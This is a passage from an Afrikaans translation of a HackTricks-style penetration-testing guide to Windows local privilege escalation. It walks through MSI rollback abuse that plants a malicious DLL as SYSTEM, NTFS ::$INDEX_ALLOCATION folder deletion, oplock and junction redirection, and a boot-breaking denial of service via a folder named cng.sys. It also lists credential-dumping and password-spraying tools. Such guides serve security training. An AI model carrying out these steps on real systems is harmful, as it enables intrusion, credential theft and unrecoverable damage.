• Hierdie install sal gebruik word om weer rollback te trigger, wat .rbs en .rbf sal lees.

• Stap 8: Monitor for .rbs

• Gebruik ReadDirectoryChangesW om C:\Config.Msi te monitor totdat ’n nuwe .rbs verskyn.

• Vang die lêernaam op.

• Stap 9: Sync Before Rollback

• Die .msi bevat ’n custom install action (SyncBeforeRollback) wat:

• ’n event sein wanneer die .rbs geskep is.

• Dan wag voordat dit voortgaan.

• Stap 10: Reapply Weak ACL

• Nadat jy die '.rbs created' event ontvang het:

• Die Windows Installer herpas sterk ACLs op C:\Config.Msi.

• Maar aangesien jy steeds ’n handle met WRITE_DAC het, kan jy weer swak ACLs heraansoek.

ACLs word slegs afgedwing op handle open, so jy kan steeds na die gids skryf.

• Stap 11: Drop Fake .rbs and .rbf

• Oorskryf die .rbs lêer met ’n valse rollback script wat Windows vertel om:

• Jou .rbf lêer (kwaadaardige DLL) te herstel na ’n geprivilegieerde lokasie (bv. C:\Program Files\Common Files\microsoft shared\ink\HID.DLL).

• Jou valse .rbf te plaas wat ’n kwaadaardige SYSTEM-level payload DLL bevat.

• Stap 12: Trigger the Rollback

• Sein die sync event sodat die installer voortgaan.

• ’n type 19 custom action (ErrorOut) is geconfigureer om die install doelbewus op ’n bekende punt te laat misluk.

• Dit veroorsaak dat rollback begin.

• Stap 13: SYSTEM Installs Your DLL

• Windows Installer:

• Lees jou kwaadwillige .rbs.

• Kopieer jou .rbf DLL in die teiken-ligging.

• Jy het nou jou kwaadaardige DLL in ’n SYSTEM-loaded path.

• Final Step: Execute SYSTEM Code

• Voer ’n vertroude auto-elevated binary uit (bv. osk.exe) wat die DLL wat jy gekaap het, laai.

• Boom: Jou kode word uitgevoer as SYSTEM.

From Arbitrary File Delete/Move/Rename to SYSTEM EoP

Die hoof MSI rollback-tegniek (hierbo) veronderstel dat jy ’n gehele vouer kan verwyder (bv. C:\Config.Msi). Maar wat as jou kwetsbaarheid slegs arbitrary file deletion toelaat?

Jy kan NTFS-internals misbruik: elke vouer het ’n verborge alternate data stream genaamd:

C:\SomeFolder::$INDEX_ALLOCATION

Hierdie stroom stoor die indeks metagegewens van die vouer.

Dus, as jy die ::$INDEX_ALLOCATION stroom verwyder van ’n vouer, NTFS verwyder die hele vouer van die lêerstelsel.

Jy kan dit doen met behulp van standaard lêerverwyderings-API’s soos:

DeleteFileW(L"C:\\Config.Msi::$INDEX_ALLOCATION");

Alhoewel jy ’n lêer verwyder-API aanroep, verwyder dit die gids self.

Van Folder Contents Delete na SYSTEM EoP

Wat as jou primitief nie toelaat dat jy arbitrêre lêers/gidse verwyder nie, maar dit laat wel toe dat die inhoud van ’n deur die aanvaller beheerde gids verwyder word?

1. Stap 1: Stel ’n lok-gids en lêer op

• Skep: C:\temp\folder1
• Daarbinne: C:\temp\folder1\file1.txt

2. Stap 2: Plaas ’n oplock op file1.txt

• Die oplock pauzeer uitvoering wanneer ’n geprivilegieerde proses probeer om file1.txt te verwyder.

// pseudo-code
RequestOplock("C:\\temp\\folder1\\file1.txt");
WaitForDeleteToTriggerOplock();

3. Stap 3: Ontlok SYSTEM-proses (bv., SilentCleanup)

• Hierdie proses skandeer vouers (bv. %TEMP%) en probeer hul inhoud uitvee.
• Wanneer dit by file1.txt uitkom, trigger die oplock en oorhandig dit beheer aan jou callback.

4. Stap 4: Binne die oplock callback – herlei die verwydering

• Opsie A: Verskuif file1.txt na ’n ander plek

• Dit maak folder1 leeg sonder om die oplock te breek.

• Moet nie file1.txt direk verwyder nie — dit sou die oplock voortydig vrylaat.

• Opsie B: Maak van folder1 ’n junction:

# folder1 is now a junction to \RPC Control (non-filesystem namespace)
mklink /J C:\temp\folder1 \\?\GLOBALROOT\RPC Control

• Opsie C: Skep ’n symlink in \RPC Control:

# Make file1.txt point to a sensitive folder stream
CreateSymlink("\\RPC Control\\file1.txt", "C:\\Config.Msi::$INDEX_ALLOCATION")

Dit mik op die NTFS interne stroom wat vouer metadata stoor — deur dit te verwyder, verwyder dit die vouer.

5. Stap 5: Vrylaat die oplock

• SYSTEM-proses gaan voort en probeer file1.txt verwyder.
• Maar nou, as gevolg van die junction + symlink, verwyder dit eintlik:

C:\Config.Msi::$INDEX_ALLOCATION

Result: C:\Config.Msi is verwyder deur SYSTEM.

Van Arbitrary Folder Create na Permanente DoS

Benut ’n primitive wat jou toelaat om ’n arbitraire gids as SYSTEM/admin te skep — selfs al kan jy nie lêers skryf nie of swak toestemmings stel nie.

Skep ’n gids (nie ’n lêer nie) met die naam van ’n kritieke Windows driver, e.g.:

C:\Windows\System32\cng.sys

• Hierdie pad kom normaalweg ooreen met die cng.sys kernel-mode driver.
• As jy dit vooraf as ’n gids skep, misluk Windows om die werklike driver tydens opstart te laai.
• Dan probeer Windows om cng.sys tydens opstart te laai.
• Dit sien die gids, misluk om die werklike driver op te los, en vasloop of staak die opstart.
• Daar is geen terugvalopsie nie, en geen herstel sonder eksterne ingryping nie (bv. opstartherstel of toegang tot skyf).

From High Integrity to System

Nuwe diens

As jy reeds op ’n High Integrity-proses loop, kan die pad na SYSTEM maklik wees net deur ’n nuwe diens te skep en uit te voer:

sc create newservicename binPath= "C:\windows\system32\notepad.exe"
sc start newservicename

Tip

Wanneer jy ’n service binary skep, maak seker dit is ’n geldige service of dat die binary die nodige aksies uitvoer om voort te gaan, aangesien dit binne 20s gedood sal word as dit nie ’n geldige service is nie.

AlwaysInstallElevated

Van ’n High Integrity-proses kan jy probeer om die AlwaysInstallElevated registry entries te aktiveer en ’n reverse shell te installeer met ’n .msi wrapper.
More information about the registry keys involved and how to install a .msi package here.

High + SeImpersonate privilege to System

You can find the code here.

From SeDebug + SeImpersonate to Full Token privileges

As jy daardie token privileges het (waarskynlik vind jy dit in ’n reeds High Integrity-proses), sal jy byna enige proses (nie-protected processes) met die SeDebug-privilege kan open, die proses se token kopieer, en ’n arbitrêre proses met daardie token skep.
Met hierdie tegniek kies mens gewoonlik ’n proses wat as SYSTEM loop met al die token privileges (ja, jy kan SYSTEM-processes vind sonder al die token privileges).
You can find an example of code executing the proposed technique here.

Named Pipes

Hierdie tegniek word deur meterpreter gebruik om in getsystem op te skaal. Die tegniek bestaan uit ’n pipe skep en dan ’n service skep/benut om op daardie pipe te skryf. Dan sal die server wat die pipe geskep het met die SeImpersonate-privilege in staat wees om die token te impersonate van die pipe-klant (die service) en sodoende SYSTEM-privileges te bekom.
If you want to learn more about name pipes you should read this.
If you want to read an example of how to go from high integrity to System using name pipes you should read this.

Dll Hijacking

As jy daarin slaag om ’n dll te hijack wat deur ’n proses wat as SYSTEM loop gelaai word, sal jy arbitrêre kode met daardie permissies kan uitvoer. Daarom is Dll Hijacking ook nuttig vir hierdie tipe privilege escalation, en verder, dit is baie makliker om vanaf ’n high integrity process te bereik aangesien dit write permissions op die vouers het wat gebruik word om dlls te laai.
You can learn more about Dll hijacking here.

From Administrator or Network Service to System

• https://github.com/sailay1996/RpcSsImpersonator
• https://decoder.cloud/2020/05/04/from-network-service-to-system/
• https://github.com/decoder-it/NetworkServiceExploit

From LOCAL SERVICE or NETWORK SERVICE to full privs

Read: https://github.com/itm4n/FullPowers

More help

Static impacket binaries

Useful tools

Best tool to look for Windows local privilege escalation vectors: WinPEAS

PS

PrivescCheck
PowerSploit-Privesc(PowerUP) – Soek na miskonfigurasies en sensitiewe lêers (check here). Detected.
JAWS – Soek na moontlike miskonfigurasies en versamel inligting (check here).
privesc – Soek na miskonfigurasies
SessionGopher – Ekstraheer PuTTY, WinSCP, SuperPuTTY, FileZilla en RDP gestoor sessie-inligting. Gebruik -Thorough lokaal.
Invoke-WCMDump – Ekstraheer credentials vanaf Credential Manager. Detected.
DomainPasswordSpray – Spray versamelde wagwoorde oor die domein
Inveigh – Inveigh is ’n PowerShell ADIDNS/LLMNR/mDNS/NBNS spoofer en man-in-the-middle hulpmiddel.
WindowsEnum – Basiese privesc Windows enumerasie
Sherlock ~~~~ – Soek vir bekende privesc kwesbaarhede (DEPRECATED for Watson)
WINspect – Lokale kontroles (Benodig Admin regte)

Exe

Watson – Soek vir bekende privesc kwesbaarhede (moet gekompileer word met VisualStudio) (precompiled)
SeatBelt – Enumereer die gasheer en soek na miskonfigurasies (meer ’n info-versamelingshulpmiddel as privesc) (moet gekompileer word) (precompiled)
LaZagne – Ekstraheer credentials uit baie sagteware (precompiled exe op GitHub)
SharpUP – Port van PowerUp na C#
Beroot ~~~~ – Kontroleer vir miskonfigurasies (uitvoerbare precompiled op GitHub). Nie aanbeveel nie. Werk nie goed op Win10 nie.
Windows-Privesc-Check – Kontroleer vir moontlike miskonfigurasies (exe vanaf python). Nie aanbeveel nie. Werk nie goed op Win10 nie.

Bat

winPEASbat – Instrument geskep gebaseer op hierdie pos (dit benodig nie accesschk om behoorlik te werk nie, maar dit kan dit gebruik).

Local

Windows-Exploit-Suggester – Lees die uitvoer van systeminfo en beveel bruikbare exploits aan (lokale python)
Windows Exploit Suggester Next Generation – Lees die uitvoer van systeminfo en beveel bruikbare exploits aan (lokale python)

Meterpreter

multi/recon/local_exploit_suggestor

You have to compile the project using the correct version of .NET (see this). To see the installed version of .NET on the victim host you can do:

C:\Windows\microsoft.net\framework\v4.0.30319\MSBuild.exe -version #Compile the code with the version given in "Build Engine version" line

Verwysings

• http://www.fuzzysecurity.com/tutorials/16.html

• http://www.greyhathacker.net/?p=738

• http://it-ovid.blogspot.com/2012/02/windows-privilege-escalation.html

• https://github.com/sagishahar/lpeworkshop

• https://www.youtube.com/watch?v=_8xJaaQlpBo

• https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_windows.html

• https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md

• https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/

• https://github.com/netbiosX/Checklists/blob/master/Windows-Privilege-Escalation.md

• https://github.com/frizb/Windows-Privilege-Escalation

• https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/

• https://github.com/frizb/Windows-Privilege-Escalation

• http://it-ovid.blogspot.com/2012/02/windows-privilege-escalation.html

• https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md#antivirus–detections

• HTB Reaper: Format-string leak + stack BOF → VirtualAlloc ROP (RCE) and kernel token theft

• Check Point Research – Chasing the Silver Fox: Cat & Mouse in Kernel Shadows

Tip

Leer en oefen AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Leer en oefen GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Leer en oefen Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Ondersteun HackTricks

• Kyk na die subskripsie planne!
• Sluit aan by die 💬 Discord groep of die telegram groep of volg ons op Twitter 🐦 @hacktricks_live.
• Deel hacking truuks deur PRs in te dien na die HackTricks en HackTricks Cloud github repos.